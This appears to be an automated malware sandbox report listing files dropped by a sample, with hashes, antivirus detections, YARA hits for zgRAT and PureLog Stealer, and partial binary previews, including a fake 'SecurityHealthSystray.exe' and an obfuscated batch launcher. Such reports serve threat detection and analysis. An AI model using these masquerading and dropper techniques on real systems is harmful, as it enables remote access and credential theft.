Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\LNOVbeou.log

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\PdatkTco.log

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\PuTbcYNO.log

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RGruEKtj.log

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XXbRMRdv.log

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.492504448438552
Encrypted:	false
SSDEEP:	384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
MD5:	0EEEA1569C7E3EBBB530E8287D7ADCF9
SHA1:	3C196FA10144566EBFBEE7243313314094F3A983
SHA-256:	57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
SHA-512:	1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ZkzjoDJQ.log

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gBkGwLsc.log

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.41854385721431
Encrypted:	false
SSDEEP:	384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:	BBDE7073BAAC996447F749992D65FFBA
SHA1:	2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:	1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:	0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 9%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iLGHwdYd.log

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\oOURfLEr.log

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\oncOKnjP.log

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\sBmPHITf.log

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.492504448438552
Encrypted:	false
SSDEEP:	384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
MD5:	0EEEA1569C7E3EBBB530E8287D7ADCF9
SHA1:	3C196FA10144566EBFBEE7243313314094F3A983
SHA-256:	57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
SHA-512:	1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 33%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\zSWmQQDs.log

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2023936
Entropy (8bit):	7.569672649447316
Encrypted:	false
SSDEEP:	49152:gWLMtwyMxRizAwgueOJNN3lRHiKLWDWU:gLwyMb9ue0NTH2P
MD5:	54EFF01605DA5E7CBDB382C98ECE2C2A
SHA1:	BE2ECFC24603A5E282BDFBB7780A03C1410879B8
SHA-256:	26BDA6E083DB3A3C3CCAF29434850D91BBB9E10C48886A6F6A06BBF6C183448D
SHA-512:	DD00705FB9741C6400145E2433AF42605264A95E4C1FE44EE1579AC464463F9B493D8BDEF98AF4A5B03D717CD79357674CC09E5B8780C4FFE31A9704B08C89D0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g................................. ........@.. .......................@............@.................................p...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H...........X...........................................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E........M...)...........}...8....~....:.... ....8.......... ....8....8.... ....~....{....:....& ....8........~....(W...~....([... ....<Y... ........8b...~....(O... .... .... ....s....~....(S....... ....~....{....:&...& ....8.

C:\Windows\System32\CSCBF0D9C89CA2D49349EF95B69138A8B32.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	1224
Entropy (8bit):	4.435108676655666
Encrypted:	false
SSDEEP:	24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
MD5:	931E1E72E561761F8A74F57989D1EA0A
SHA1:	B66268B9D02EC855EB91A5018C43049B4458AB16
SHA-256:	093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
SHA-512:	1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
Malicious:	false
Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.9777444718486583
Encrypted:	false
SSDEEP:	48:6DJXPt3uM7Jt8Bs3FJsdcV4MKe27ddNIZvqBHqOulajfqXSfbNtm:WPdPc+Vx9M9CvkUcjRzNt
MD5:	623326506A0AFBF6D94F24BD025AEF2A
SHA1:	A5AF6DA257EFCA04925F8E4991666DDF06E257C0
SHA-256:	93B4C27EDA1AB88E1E138E6B2212A699F0B9BA5B8D2F7AEAAB3CE804BF304504
SHA-512:	F6C9FFAA2F8E9464C3DBC4575AAF79A56EE2A7CFB5CF889748F812F2FBD44D3106CE26A78618C014C1338C60B939AF020DB86742E3A3192CD7B02C3714BD2D94
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...>..g.............................'... ...@....@.. ....................................@..................................'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..X.............................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.(.......#GUID...8... ...#Blob...........WU........%3................................................................

C:\hyperIntoBroker\7ZVJJhRLWkC.bat

Download File

Process:	C:\Users\user\Desktop\DC86.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	78
Entropy (8bit):	4.7174052634289385
Encrypted:	false
SSDEEP:	3:HoOpHl5NcVAXxaOALq+lHqTURkiwSAn:IG6qB6Wy+URkPn
MD5:	65F873C875C73F084119594A4449ECEA
SHA1:	9F050C5BFC5CD3D94C37ACAC16105F031658904F
SHA-256:	825A9F47FD1242C15BD81FEA64D0F739C9E74F62A1820E182CFA069E1726FD90
SHA-512:	C4C2886FD99303E222A379A02C981532070C932ACB70D2A7460FE257E22B8B0625018FAB158E7BE011BD5B2F7C45517E2C2FC947B11B84BBBDA37ECC1BDC8D63
Malicious:	false
Preview:	%AHLU%%HXR%..%FLb%"C:\hyperIntoBroker/hyperProviderbrokermonitorNet.exe"%yKub%

C:\hyperIntoBroker\ed068ad30bc122

Download File

Process:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
File Type:	ASCII text, with very long lines (871), with no line terminators
Category:	dropped
Size (bytes):	871
Entropy (8bit):	5.902075817109225
Encrypted:	false
SSDEEP:	24:9xkrx39CWaxjUv2dP9SP/al8dmOQrmjG5JEC61v:9xkrxN6mv2dlJYbVjiJEB
MD5:	7FA44E00D4EB831D3134C382ABD96AFA
SHA1:	A09C17507669C4331A994A90D63F43E53464C0BE
SHA-256:	F6D31FD6F93AE1785D660A505A44869A38C6D7F56C11AC716C561752D70D813E
SHA-512:	4B1B005D379A2AF72404421B27BD5F8F44E8290D38CF429CB2A4CD1AF7418CBC791A1B7D3958F4ECD8C89E70F0A80CE45C52569953EFC15E7835A74320A88F28
Malicious:	false
Preview:	aM6BNeCvEXQhMD0W1VJkDVJrgWS48Qc2WoD6YKtyItKL0fq6gRBLg6yEDOf0MHwy4YLhA37qmVbTL70BpVXrOQWZ093Jp2mA6WQcUJ6mTVjKee2FYdL0uEjoBvrAAxAutbXyqXrgZvY3rL4VGxvLrvQ1wmbib5mgUzbDHDYAwoa9qq7z0W3MBzC7KfCE6IEdI1j1u1NCZuZCURLGolsFCZefwd2mBUEnj70zHFF9I0xQZ9m3U5ZVa9btXDER8lAEqwdXbV9jfs7LlNFw09RG4sMkgHcDAyAgztkngPc860zrBPHJ8Ra9U4J8j21T36irrbW2ncQlgTKE2fiQ9SFsYBM5jlEnXIEASIAk3OfgBycAuFFDUkTl0zTpObTBXmNYPKwtf7XvwirjjLKefATwydJczUVc5eIZlEvkSViXNiySHtGDQzfXTbjwBT4Kl40SaS8fakLJb6iQo1VFOSLF8vFKe9j9bXvTsg1zvkmpnW5X2THJ8y6SsuUpMyAaBMsEKPhI9fTnpfcmzrRL1ZAmack8LMm7jLobn1Mmv9KdfTnMRszegzjlMFnspj6x2VDd1B88epa2OhHHzXqdWIbumCPhOe6MCXkJPJVQt090YrXo8f2S2dau4T1yvauAsOz1671qBZtgIkV5pkjsloTj60O5RheTG9HK1fsAoMQct4lT85IL1CYE4Q4Fs5Ye5aaIcKDK1iEYY0zCP47VYSbDkDPlknRsyvhTdc0x18UT89qDa10x8CFm8WiZ4cjNQWkmTgjwEKda8IFlWMKtxdtvq5UH4b2ZYGClZDu4SDtxipnzQ7CsS0awmy6XLb1mSEB1GdLSbQatt6MASe17YJHipQ9kHXt1MHfenvtwvtR

C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe

Download File

Process:	C:\Users\user\Desktop\DC86.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2023936
Entropy (8bit):	7.569672649447316
Encrypted:	false
SSDEEP:	49152:gWLMtwyMxRizAwgueOJNN3lRHiKLWDWU:gLwyMb9ue0NTH2P
MD5:	54EFF01605DA5E7CBDB382C98ECE2C2A
SHA1:	BE2ECFC24603A5E282BDFBB7780A03C1410879B8
SHA-256:	26BDA6E083DB3A3C3CCAF29434850D91BBB9E10C48886A6F6A06BBF6C183448D
SHA-512:	DD00705FB9741C6400145E2433AF42605264A95E4C1FE44EE1579AC464463F9B493D8BDEF98AF4A5B03D717CD79357674CC09E5B8780C4FFE31A9704B08C89D0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]g................................. ........@.. .......................@............@.................................p...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H...........X...........................................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E........M...)...........}...8....~....:.... ....8.......... ....8....8.... ....~....{....:....& ....8........~....(W...~....([... ....<Y... ........8b...~....(O... .... .... ....s....~....(S....... ....~....{....:&...& ....8.

C:\hyperIntoBroker\vN1MMUTrCtC1FtSWQe4vLUvQugg9bTGuni3V.vbe

Download File

Process:	C:\Users\user\Desktop\DC86.exe
File Type:	data
Category:	dropped
Size (bytes):	205
Entropy (8bit):	5.744087768721463
Encrypted:	false
SSDEEP:	6:GxwqK+NkLzWbH1xdyrFnBaORbM5nCsp+gXhRSCWu:GkMCzWL1xdyhBaORbQCsoihD
MD5:	3ABC77A7E4977F35CAB6E9F29E677438
SHA1:	BD300A11EA5AF663FE723883F8B5D980D1CBB417
SHA-256:	E987A0608105AF1E7422322184159C1559B26E3D84C27917408C2CDBBD9F9A72
SHA-512:	B445FD9B854E822077D17B060EDD7E253B8E8AEB8EBFB4E1084E2D604276295D715101F0CE1E1B25F0D83247385F76B1AB8885EFD7BA6286CD8317D994359CB1
Malicious:	false
